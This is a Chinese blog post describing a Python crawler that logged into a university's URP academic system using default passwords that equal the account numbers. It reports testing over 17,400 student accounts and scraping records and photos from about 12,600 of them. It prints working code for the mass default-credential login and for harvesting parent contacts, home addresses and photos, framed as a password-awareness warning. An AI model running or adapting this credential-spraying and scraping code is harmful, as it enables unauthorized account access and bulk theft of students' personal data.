Python 爬虫获取 URP 教务系统学籍信息-你的个人信息正暴露在互联网中!
2018-02-11 12:17
851 查看
原创文章,转载务必注明原文链接!
初衷
本文旨在提醒同学们及时修改密码,增强保护个人隐私的意识,因此代码中一些关键数据以及校名等信息不会公开!复制粘贴文章中的代码不会爬到任何东西。只是作为学习 Python 爬虫的一点总结而已!作者所在学校的教务系统安全防范措施可谓非常不严密,学生登录甚至不需要图形验证码。每年学生入学之后,学校下发的账号,初始密码不是无规律的,而是和账号完全一致!如果学生不及时修改密码,那么其他人可以轻松登录他的账号。登录后可以看到学生的学籍信息,包括高考报名时照片,家长联系方式等,联系地址甚至详细到几单元几楼几号门,个人信息泄露情况非常严重!
结果
先说结果。经过两天连写带调试,终于完成了对全校本科生 17400 多个在网账号的测试,其中有 12600 多个账号使用的还是初始密码。此处隐去校名,统计结果如下:序号 | 学院 | 年级 | 在网账号 | 可爬账号 | 年级占比 |
---|---|---|---|---|---|
1 | 本一 | 2014 | 3157 | 1998 | 63.29% |
2 | 本一 | 2015 | 3328 | 2234 | 67.13% |
3 | 本一 | 2016 | 3641 | 3066 | 84.21% |
4 | 本一 | 2017 | 3497 | 3326 | 95.11% |
5 | 本三 | 2014 | 1759 | 303 | 17.23% |
6 | 本三 | 2015 | 1643 | 620 | 37.74% |
7 | 本三 | 2016 | 1605 | 1434 | 89.35% |
8 | 本三 | 2017 | 1552 | 639 | 41.17% |
过程
本人之前做过近 2 年的 Java 相关开发,对 HTTP 协议中常用的知识了解一些,再加上 Python 出了名的简洁易用,因此入门还是比较轻松的。去年有一段时间研究过一阵子 Python,使用的是 Scrapy 框架,所以这一次我也首先想到了 Scrapy。Scrapy 这种框架适用的情形是:已经获取了需要爬取的页面的一系列 URL ,或者 URL 是成一定规律变化的,不需要登录或者登录一次拿到 Cookie 就可以拿着这个 Cookie 一直用了。但是教务系统完全相反,它需要每次都进行登录,也许 Scrapy 有办法,但也不会太简单,索性自己写。
这套教务系统虽然安全性不怎么样,但也已是一套成熟的产品了,功能和稳定性上还是很不错的。
首先使用 Firefox 浏览器的开发者工具查看 HTTP 通信的一些信息:
登录表单通过 POST 请求进行提交,参数是账号和密码,发送的也是明文
服务器返回的响应中 Set-Cookie 就相当于给用户下发的令牌,用户下一次请求的时候带上这块令牌,服务器就能认出来这个用户是否刚登录过。这个令牌是有时间限制的,每次请求都会刷新一次时间,如果两次请求之间间隔时间超过设定值,那么服务器就不认识用户了,这次会话就结束了,需要重新登录。
刚开始使用的是 requests ,用 for 循环实现,由于 requests 是同步的,所以效率很低,还会经常卡死。后来改成了协程,用的 gevent + urllib3,效率提升了上百倍。解析 HTML 用的 lxml 的 etree,图片的保存用 PIL 的 Image。
先引入依赖
import sys import logging import gevent import urllib3 import pathlib from PIL import Image from io import BytesIO from lxml import etree
创建 HTTP 连接池
http = urllib3.HTTPConnectionPool( host=settings.SERVER_HOST, port=settings.SERVER_PORT, strict=False, maxsize=100, block=False, retries=100, timeout=10 )
请求头的一些固定信息可以预先设定好,伪装浏览器
header = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Cache-Control': 'max-age=0', 'Connection': 'Keep-alive', 'Host': settings.SERVER_HOST, 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0' }
登录并验证是否是初始密码
# 账号校验器 class InfoValidate(object): def __init__(self): self.logger = InfoMain.logger self.http = InfoMain.http # 有效账号 self.account_valid = [] # 可爬账号 self.account_available = [] def validate(self, all_account): # 将所有校验过程加入队列 jobs = [gevent.spawn(self.validate_account, self.http, a) for a in all_account] gevent.joinall(jobs, timeout=0) def validate_account(self, http, account): # 登录请求参数 param = {"zjh": account, "mm": account} header = headers.header response = http.request('POST', settings.URL_LOGIN, fields=param, headers=header) self.logger.info('发送请求>>{}'.format(param)) self.logger.info(response.status) # 响应体解码 res_text = response.data.decode('GB2312', 'ignore') if res_text.find('密码不正确') > -1: # 密码有误 self.account_valid.append(account) elif not res_text.find('证件号不存在') > -1: # 账号可爬 self.account_available.append(account) self.account_valid.append(account) self.logger.info("账号可用>>>{}".format(account))
至此已经获取了所有初始密码未修改的账号了,下面研究一下,要爬取的学籍信息页的规律
一系列的信息都包裹在
<td width = "275"></td>之间,对应的 xpath 表达式即为
//td[starts-with(@width,"275")]/text()
基于之前对账号的测试,爬取学籍信息
# 信息收集器 class InfoCollect(object): def __init__(self): self.logger = InfoMain.logger self.http = InfoMain.http # 功能模块 self.mod_get_roll_info = settings.MOD_ROLL_INFO self.mod_get_roll_img = settings.MOD_ROLL_IMG def get_info_queue(self, accounts): # 将所有信息收集过程加入队列 jobs = [gevent.spawn(self.get_info, a) for a in accounts] gevent.joinall(jobs, timeout=0) def get_info(self, stuid): # 登录 param = {'zjh': stuid, 'mm': stuid} response = self.http.request('POST', settings.URL_LOGIN, fields=param) # 保存 Cookie cookie = response.headers['Set-Cookie'].replace('; path=/', '') header = headers.header header['cookie'] = cookie # 学籍信息 if self.mod_get_roll_info: # 带 Cookie 访问学籍信息页 response_xjxx = self.http.request('GET', settings.URL_XJXX, headers=header) text = response_xjxx.data.decode('GB2312', 'ignore') # 解析页面内容 selector = etree.HTML(text) text_arr = selector.xpath('//td[starts-with(@width,"275")]/text()') # 学籍信息 result = [] for info in text_arr: result.append(info.strip()) self.save_info(result) # 学籍照片 if self.mod_get_roll_img: response_xjzp = self.http.request('GET', settings.URL_XJZP, headers=header) image = Image.open(BytesIO(response_xjzp.data)) setpath = settings.PATH_IMG_SAVE path = pathlib.Path(setpath) if not path.exists(): path.mkdir() setpath = setpath + '/' + stuid + '.jpg' image.save(setpath) self.logger.info('保存照片>>>{}'.format(setpath)) # 登出 self.http.request('POST', settings.URL_LOGOUT, headers=header)
至此,已经实现了所有信息的获取以及照片的保存。
没改密码的同学们应该看到了,获取个人信息其实很简单,关键在于增强自己保护个人信息的意识。
相关开源项目:URP_Spider https://github.com/JamesZBL/URP_Spider
相关文章推荐
- python 爬虫实战--登陆学校教务系统获取成绩信息
- python爬虫登录正方教务管理系统获取成绩数据
- python爬虫(14)获取淘宝MM个人信息及照片(中)
- python爬虫获取强智科技教务系统学科成绩(模拟登录+成绩获取)
- python爬虫(14)获取淘宝MM个人信息及照片(下)(windows版本)
- python爬虫学习(4) —— 手刃「URP教务系统」
- python爬虫(14)获取淘宝MM个人信息及照片(上)
- Python爬虫模拟登录京东获取个人信息
- python获取linux系统信息、性能阀值、短信网关发送的例子
- 玩转Python爬虫与信息获取(1)
- Python_模拟登录(爬取教务系统信息并制作查询界面)
- 用Python爬虫爬取广州大学教务系统的成绩(内网访问)
- python 爬虫登陆学校教务系统之验证码识别
- Python爬虫学习--获取CSDN个人的访问量
- 使用Python获取Linux系统的各种信息
- python爬虫正方教务系统
- 使用 Python 获取 Linux 系统信息的代码
- python爬虫正方教务系统
- 哈工大(深圳)教务系统Python爬虫1.2
- Python实现可获取网易页面所有文本信息的网易网络爬虫功能示例